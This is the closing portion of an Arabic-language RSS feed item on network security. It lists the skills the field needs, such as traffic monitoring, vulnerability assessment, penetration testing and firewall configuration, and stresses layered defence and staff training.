&lt;h2 id=&quot;المهارات-المطلوبة-في-أمن-الشبكات&quot;&gt;المهارات المطلوبة في أمن الشبكات&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;إدارة الأنظمة والتجهيزات والبرامج واكتشاف الأخطاء وإصلاحها.&lt;/li&gt;
&lt;li&gt;تقييم المشاكل الأمنية ومراقبة الشبكات وحركة البيانات عبرها.&lt;/li&gt;
&lt;li&gt;التخطيط والتطبيق لإجراءات وتدابير الحماية وتثبيت برامج الحماية لاكتشاف أي انتهاك أو خرق أمني.&lt;/li&gt;
&lt;li&gt;إدارة سلوك الموظفين فيما يتعلق بأمن المعلومات.&lt;/li&gt;
&lt;li&gt;اكتشاف الثغرات وتحليلها وإجراء عمليات اختبار الاختراق.&lt;/li&gt;
&lt;li&gt;إعداد وضبط الجدار الناري وأجهزة الحماية الأخرى بشكل فعال.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;يوجد العديد من الطبقات التي يجب مراعاتها عند التعامل مع أمن الشبكات للمؤسسات لأن الهجمات ممكن ان تحدث في أي طبقة من طبقات الشبكة لذلك يجب إعداد أجهزة وبرامج سياسات الحماية لمعالجة كل منطقة ضمن الشبكة.&lt;/p&gt;
&lt;p&gt;يجب أن لا ننسى أبداً أن الأشخاص والعمليات لا تقل أهمية عن تقنيات وأجهزة حماية الشبكة لا تصدق أبداً أن الأجهزة او تقنيات الحماية كافية بحد ذاتها لذلك يجب توعية وتدريب الموظفين أمنياً وتطبيق الضوابط والسياسات الأمنية بشكل دائم.&lt;/p&gt;
</content:encoded><category>الشبكات</category><category>أمن الشبكات</category><category>Network Security</category><category>الدفاع في العمق</category><category>الجدار الناري</category><category>SIEM</category></item></channel></rss>